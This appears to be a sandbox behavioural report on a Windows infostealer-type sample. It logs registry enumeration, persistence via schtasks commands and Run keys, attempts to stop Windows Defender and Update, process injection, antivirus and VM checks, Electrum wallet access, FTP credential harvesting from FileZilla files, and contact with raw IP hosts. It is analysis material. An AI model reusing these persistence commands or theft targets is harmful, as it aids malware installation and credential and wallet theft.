RegOpenKeyExA Jan. 26, 2024, 9:01 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980} base_handle: 0x80000002 key_handle: 0x00000470 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}	1
RegOpenKeyExA Jan. 26, 2024, 9:01 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0} base_handle: 0x80000002 key_handle: 0x00000470 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}	1
RegOpenKeyExA Jan. 26, 2024, 9:01 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10} base_handle: 0x80000002 key_handle: 0x00000470 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}	1
RegOpenKeyExA Jan. 26, 2024, 9:01 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA} base_handle: 0x80000002 key_handle: 0x00000470 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}	1
RegOpenKeyExA Jan. 26, 2024, 9:01 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0015-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000470 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0015-0409-0000-0000000FF1CE}	1
RegOpenKeyExA Jan. 26, 2024, 9:01 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0016-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000470 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0016-0409-0000-0000000FF1CE}	1
RegOpenKeyExA Jan. 26, 2024, 9:01 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0018-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000470 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0018-0409-0000-0000000FF1CE}	1
RegOpenKeyExA Jan. 26, 2024, 9:01 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0019-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000470 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0019-0409-0000-0000000FF1CE}	1
RegOpenKeyExA Jan. 26, 2024, 9:01 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001A-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000470 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001A-0409-0000-0000000FF1CE}	1
RegOpenKeyExA Jan. 26, 2024, 9:01 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001B-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000470 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001B-0409-0000-0000000FF1CE}	1
RegOpenKeyExA Jan. 26, 2024, 9:01 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000470 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0409-0000-0000000FF1CE}	1
RegOpenKeyExA Jan. 26, 2024, 9:01 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-040C-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000470 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-040C-0000-0000000FF1CE}	1
RegOpenKeyExA Jan. 26, 2024, 9:01 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0C0A-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000470 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0C0A-0000-0000000FF1CE}	1
RegOpenKeyExA Jan. 26, 2024, 9:01 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-002C-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000470 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-002C-0409-0000-0000000FF1CE}	1
RegOpenKeyExA Jan. 26, 2024, 9:01 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0044-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000470 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0044-0409-0000-0000000FF1CE}	1
RegOpenKeyExA Jan. 26, 2024, 9:01 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-006E-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000470 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-006E-0409-0000-0000000FF1CE}	1
RegOpenKeyExA Jan. 26, 2024, 9:01 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0090-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000470 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0090-0409-0000-0000000FF1CE}	1
RegOpenKeyExA Jan. 26, 2024, 9:01 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00A1-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000470 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00A1-0409-0000-0000000FF1CE}	1
RegOpenKeyExA Jan. 26, 2024, 9:01 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00BA-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000470 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00BA-0409-0000-0000000FF1CE}	1
RegOpenKeyExA Jan. 26, 2024, 9:01 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E1-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000470 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E1-0409-0000-0000000FF1CE}	1
RegOpenKeyExA Jan. 26, 2024, 9:01 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E2-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000470 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E2-0409-0000-0000000FF1CE}	1
RegOpenKeyExA Jan. 26, 2024, 9:01 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0115-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000470 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0115-0409-0000-0000000FF1CE}	1
RegOpenKeyExA Jan. 26, 2024, 9:01 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0117-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000470 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0117-0409-0000-0000000FF1CE}	1
RegOpenKeyExA Jan. 26, 2024, 9:01 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-012B-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000470 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-012B-0409-0000-0000000FF1CE}	1
RegOpenKeyExA Jan. 26, 2024, 9:01 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{91150000-0011-0000-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000470 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{91150000-0011-0000-0000-0000000FF1CE}	1
RegOpenKeyExA Jan. 26, 2024, 9:01 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4} base_handle: 0x80000002 key_handle: 0x00000470 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}	1
RegOpenKeyExA Jan. 26, 2024, 9:01 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40} base_handle: 0x80000002 key_handle: 0x00000470 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}	1
RegOpenKeyExA Jan. 26, 2024, 9:01 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100} base_handle: 0x80000002 key_handle: 0x00000470 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}	1
RegOpenKeyExA Jan. 26, 2024, 9:01 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561} base_handle: 0x80000002 key_handle: 0x00000470 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}	1

Terminates another process (4 events)

Time & API	Arguments	Status
NtTerminateProcess Jan. 26, 2024, 9:02 a.m.	status_code: 0xffffffff process_identifier: 2760 process_handle: 0x00000638
NtTerminateProcess Jan. 26, 2024, 9:02 a.m.	status_code: 0xffffffff process_identifier: 2760 process_handle: 0x00000638	1
NtTerminateProcess Jan. 26, 2024, 9:02 a.m.	status_code: 0xffffffff process_identifier: 2840 process_handle: 0x00000638
NtTerminateProcess Jan. 26, 2024, 9:02 a.m.	status_code: 0xffffffff process_identifier: 2840 process_handle: 0x00000638	1

Uses Windows utilities for basic Windows functionality (8 events)

cmdline	schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\test22\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explorhe.exe /TR "C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe" /F
cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN explorhe.exe /TR "C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe" /F
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
cmdline	"C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2760 CREDAT:145409
cmdline	"C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
cmdline	chcp 1251

Executes one or more WMI queries which can be used to identify virtual machines (1 event)

wmi	SELECT * FROM Win32_Processor

Connects to an IRC server, possibly part of a botnet

Communicates with host for which no DNS query was performed (10 events)

host	109.107.182.3
host	141.95.211.148
host	185.172.128.109
host	185.172.128.19
host	185.172.128.90
host	185.215.113.68
host	193.233.132.62
host	5.42.64.33
host	94.156.67.230
host	195.20.16.103

Allocates execute permission to another process indicative of possible code injection (1 event)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory Jan. 26, 2024, 9:02 a.m.	process_identifier: 2620 region_size: 335872 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000228	1	0	0

Attempts to identify installed AV products by installation directory (8 events)

file	C:\ProgramData\AVAST Software
file	C:\ProgramData\Avira
file	C:\ProgramData\Kaspersky Lab
file	C:\ProgramData\Panda Security
file	C:\ProgramData\Bitdefender
file	C:\ProgramData\AVG
file	C:\ProgramData\Doctor Web
file	C:\Users\test22\AppData\Local\Temp\SandboxieInstall.exe

Attempts to stop active services (2 events)

Time & API	Arguments	Status	Return	Repeated
ControlService Jan. 26, 2024, 9:01 a.m.	service_handle: 0x006e8fe8 service_name: WinDefend control_code: 1		0	0
ControlService Jan. 26, 2024, 9:01 a.m.	service_handle: 0x006e93d0 service_name: wuauserv control_code: 1		0	0

Looks for the Windows Idle Time to determine the uptime (1 event)

Time & API	Arguments	Status	Return	Repeated
NtQuerySystemInformation Jan. 26, 2024, 9:02 a.m.	information_class: 8 (SystemProcessorPerformanceInformation)	1	0	0

Checks the version of Bios, possibly for anti-virtualization (2 events)

registry	HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
registry	HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion

Checks the CPU name from registry, possibly for anti-virtualization (1 event)

registry

HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString

Installs itself for autorun at Windows startup (7 events)

reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\RageMP131	reg_value	C:\Users\test22\AppData\Local\RageMP131\RageMP131.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\stan.exe	reg_value	C:\Users\test22\AppData\Local\Temp\1000609001\stan.exe
cmdline	schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\test22\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explorhe.exe /TR "C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe" /F
cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN explorhe.exe /TR "C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe" /F
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST

Attempts to access Bitcoin/ALTCoin wallets (1 event)

file	C:\Users\test22\AppData\Roaming\Electrum\wallets

Deletes executed files from disk (1 event)

file	C:\Users\test22\AppData\Local\Temp\BroomSetup.exe

Attempts to disable Windows Auto Updates (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU\NoAutoUpdate

Harvests credentials from local FTP client softwares (3 events)

file	C:\Users\test22\AppData\Roaming\GHISLER\wcx_ftp.ini
file	C:\Users\test22\AppData\Roaming\FileZilla\sitemanager.xml
file	C:\Users\test22\AppData\Roaming\FileZilla\recentservers.xml

Executes one or more WMI queries (7 events)

wmi	SELECT * FROM AntivirusProduct
wmi	SELECT * FROM Win32_VideoController
wmi	SELECT * FROM Win32_Process Where SessionId='1'
wmi	SELECT * FROM AntiSpyWareProduct
wmi	SELECT * FROM FirewallProduct
wmi	SELECT * FROM Win32_DiskDrive
wmi	SELECT * FROM Win32_Processor

Potential code injection by writing to the memory of another process (3 events)

Time & API	Arguments	Status	Return
WriteProcessMemory Jan. 26, 2024, 9:02 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL¸éïà0äÌ @ @@K ÀÉ H.textâ ä `.rsrcÀÉ Êæ@@.reloc°@B base_address: 0x00400000 process_identifier: 2620 process_handle: 0x00000228	1	1
WriteProcessMemory Jan. 26, 2024, 9:02 a.m.	buffer: 2 base_address: 0x00450000 process_identifier: 2620 process_handle: 0x00000228	1	1
WriteProcessMemory Jan. 26, 2024, 9:02 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2620 process_handle: 0x00000228	1	1

Code injection by writing an executable or DLL to the memory of another process (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory Jan. 26, 2024, 9:02 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL¸éïà0äÌ @ @@K ÀÉ H.textâ ä `.rsrcÀÉ Êæ@@.reloc°@B base_address: 0x00400000 process_identifier: 2620 process_handle: 0x00000228	1	1	0

Collects information about installed applications (50 out of 114 events)

Time & API	Arguments	Status
RegQueryValueExA Jan. 26, 2024, 9:01 a.m.	key_handle: 0x00000470 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 7-Zip 20.02 alpha regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName	1
RegQueryValueExA Jan. 26, 2024, 9:01 a.m.	key_handle: 0x00000470 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName	1
RegQueryValueExA Jan. 26, 2024, 9:01 a.m.	key_handle: 0x00000470 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1
RegQueryValueExA Jan. 26, 2024, 9:01 a.m.	key_handle: 0x00000470 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
RegQueryValueExA Jan. 26, 2024, 9:01 a.m.	key_handle: 0x00000470 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: ????? ?? 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName	1
RegQueryValueExA Jan. 26, 2024, 9:01 a.m.	key_handle: 0x00000470 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Mozilla Thunderbird 78.4.0 (x86 ko) regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)\DisplayName	1
RegQueryValueExA Jan. 26, 2024, 9:01 a.m.	key_handle: 0x00000470 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Professional Plus 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR\DisplayName	1
RegQueryValueExA Jan. 26, 2024, 9:01 a.m.	key_handle: 0x00000470 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}\DisplayName	1
RegQueryValueExA Jan. 26, 2024, 9:01 a.m.	key_handle: 0x00000470 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: HttpWatch Professional 9.3.39 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName	1
RegQueryValueExA Jan. 26, 2024, 9:01 a.m.	key_handle: 0x00000470 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: ????? ?? 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName	1
RegQueryValueExA Jan. 26, 2024, 9:01 a.m.	key_handle: 0x00000470 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Java 8 Update 131 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}\DisplayName	1
RegQueryValueExA Jan. 26, 2024, 9:01 a.m.	key_handle: 0x00000470 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Java Auto Updater regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}\DisplayName	1
RegQueryValueExA Jan. 26, 2024, 9:01 a.m.	key_handle: 0x00000470 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Google Update Helper regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName	1
RegQueryValueExA Jan. 26, 2024, 9:01 a.m.	key_handle: 0x00000470 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Access MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0015-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Jan. 26, 2024, 9:01 a.m.	key_handle: 0x00000470 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Excel MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0016-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Jan. 26, 2024, 9:01 a.m.	key_handle: 0x00000470 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft PowerPoint MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0018-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Jan. 26, 2024, 9:01 a.m.	key_handle: 0x00000470 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Publisher MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0019-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Jan. 26, 2024, 9:01 a.m.	key_handle: 0x00000470 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Outlook MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001A-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Jan. 26, 2024, 9:01 a.m.	key_handle: 0x00000470 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Word MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001B-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Jan. 26, 2024, 9:01 a.m.	key_handle: 0x00000470 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing Tools 2013 - English regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Jan. 26, 2024, 9:01 a.m.	key_handle: 0x00000470 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Outils de vérification linguistique 2013 de Microsoft Office - Français regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-040C-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Jan. 26, 2024, 9:01 a.m.	key_handle: 0x00000470 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing Tools 2013 - Español regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0C0A-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Jan. 26, 2024, 9:01 a.m.	key_handle: 0x00000470 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-002C-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Jan. 26, 2024, 9:01 a.m.	key_handle: 0x00000470 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft InfoPath MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0044-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Jan. 26, 2024, 9:01 a.m.	key_handle: 0x00000470 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-006E-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Jan. 26, 2024, 9:01 a.m.	key_handle: 0x00000470 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft DCF MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0090-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Jan. 26, 2024, 9:01 a.m.	key_handle: 0x00000470 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft OneNote MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00A1-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Jan. 26, 2024, 9:01 a.m.	key_handle: 0x00000470 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Groove MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00BA-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Jan. 26, 2024, 9:01 a.m.	key_handle: 0x00000470 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OSM MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E1-0409-0000-0000000FF1CE}\DisplayName	1
